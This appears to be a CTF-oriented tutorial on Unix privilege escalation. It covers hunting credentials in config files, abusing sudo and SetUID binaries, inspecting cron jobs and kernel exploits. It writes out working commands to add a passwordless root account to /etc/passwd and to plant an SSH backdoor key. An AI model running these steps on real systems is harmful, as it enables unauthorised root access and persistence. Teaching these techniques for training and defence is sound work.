Privilege Elevation - Unix

Principle

You just got shell access to a server. Let start by an exhaustive inventory of what is accessible to your account.

  • Identify the OS, its version, the missing security patches
  • List available tools: netcat, python, perl...
  • Read all config, temporary, backup files to find login/password.
  • Use the possible sudo rights of the account.
  • Find commands with SetUID bit.
  • Find a process running in the background with root rights and modify its inputs.
  • Find a kernel exploit. This last option, radical because it can crash the machine, is very efficient on old servers...

On your first servers, it is preferable to make these enumerations by launching the commands manually, so you can appropriate the options and outputs. Once comfortable, and knowing what you are looking for, feel free to use scripts that do these enumerations for you.

Files containing usefull informations

Find readables files

Find .txt or .cfg files, owned by other accounts, and readable.

find /home -readable -type f  \( -iname \*.txt -o -iname \*.cfg \) 2>/dev/null
find /home -E . -regex '.*\.(txt|cfg)' 2>/dev/null
Web app: Wordpress

Wordpress config file is:

wp-config.php

Let find it:

find /var -name wp-config.php 2>/dev/null

This config file contains login/password used to connect to the blog database. By dumping the database, it's thus possible to get wordpress user's login and password hashes.

Web server: Apache

Apache config file name may be :

httpd.conf
apache2.conf

On le trouve généralement dans un des répertoires:

/etc/apache2/httpd.conf
/etc/apache2/apache2.conf
/etc/httpd/httpd.conf
/etc/httpd/conf/httpd.conf
Web server: Tomcat

Tomcat config file is named:

server.xml

User's accounts can be found in :

tomcat-users.xml

Thos files are usually found in:

TOMCAT-HOME/conf/
/usr/local/tomcat/conf/

Sudo

Sudo

Sudo allows to launch commands as another user.

To know the sudo rights of your account, you must launch the command sudo -l and enter your password:

sudo -l
User1 can use the following commands on target-host :
    (ALL) NOPASSWD: /usr/bin/find
    user2 NOPASSWD: /usr/bin/python3 /home/user2/run.py

It is then possible to run commands as user2 with the option -u user2

sudo /usr/bin/find  
sudo -u user2 /usr/bin/python3  /home/user2/run.py

You can run find with root account rights, and run.py with user2 account rights..

If the NOPASSWD option is not defined, the sudo command asks for the current account password. If you have entered through a webshell, or an ssh connection with a private key, you will have to manage to know the password.

SetUID bit

SetUID bits

Identify processes with a setUID bit

find / -perm -4000 -exec ls -al {} \; 2>/dev/null

What to do with a binary having a setUID bit ?

- Run a shell
- Read a flag
- Copy a file
- Add an entry in a file : /etc/sudoers, /etc/passwd, ~/.ssh/authorized_keys
- ...
Process to allowing to launch a shell

Many processes allow to launch a shell. Perfect with sudo or a setUID bit.

- find
- nmap
- vi
- less
- awk
- tee
...

Reference: https://gtfobins.github.io/

Add a password less account with root rights

If you have the rights to modify /etc/passwd, you can be root. For example tee with a sudo as root. Add an entry with a UID of 0 (root UID), and an empty password.

echo myroot::0:0:::/bin/bash | sudo tee -a /etc/passwd 
su myroot
Create an ssh backdoor by adding a public key. 
echo 'ssh-rsa AAAAB3[...]CHN2CpQ== yolo@yolospacehacker.com' > /home/victim/.ssh/authorized_keys
ssh -i id_rsa victim@iptarget

Process exploitation

ps

Identify processes running as root 

ps eaxf

Once an interresting process found, see if it's possible to modify the files read by the process, or if the process has known vulnerabilities.

Cron

Identify cron tasks.

cat /etc/cron.d/*
cat /var/spool/cron/*
crontab -l
cat /etc/crontab
cat /etc/cron.(time)
systemctl list-timers
Process Spy

With the ps command, you may miss a small process, launched every 2 minutes, which will process a batch file in 5 seconds before disappearing. The pspy tool monitors the processes for you.

https://github.com/DominicBreuker/pspy

Kernel exploit

Kernel exploit

Linux Distib version:

cat /etc/issue
Ubuntu 18.04.3 LTS

Linux kernel version: 5.0.0-37-generic

uname -a
Linux yoloctf-server 5.0.0-37-generic #40~18.04.1-Ubuntu SMP Thu Nov 14 12:06:39 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Once the kernel version is known, it is possible to search for a kernel exploit
https://github.com/SecWiki/linux-kernel-exploits
Never run an unknown binary !
Get the sources, read them, understand what they do, compile yourself, and only then run them... Knowing that there is a high risk of crashing the server.

Enumeration scripts

Enum scripts

Some well known script automate the enumeration process.
Test them and find the one that suits you best.

linPeass : https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
LinEnum.sh : https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
linuxprivchecker.py : https://github.com/sleventyeleven/linuxprivchecker
unixprivesc.sh : https://github.com/pentestmonkey/unix-privesc-check
lse.sh : https://github.com/diego-treitos/linux-smart-enumeration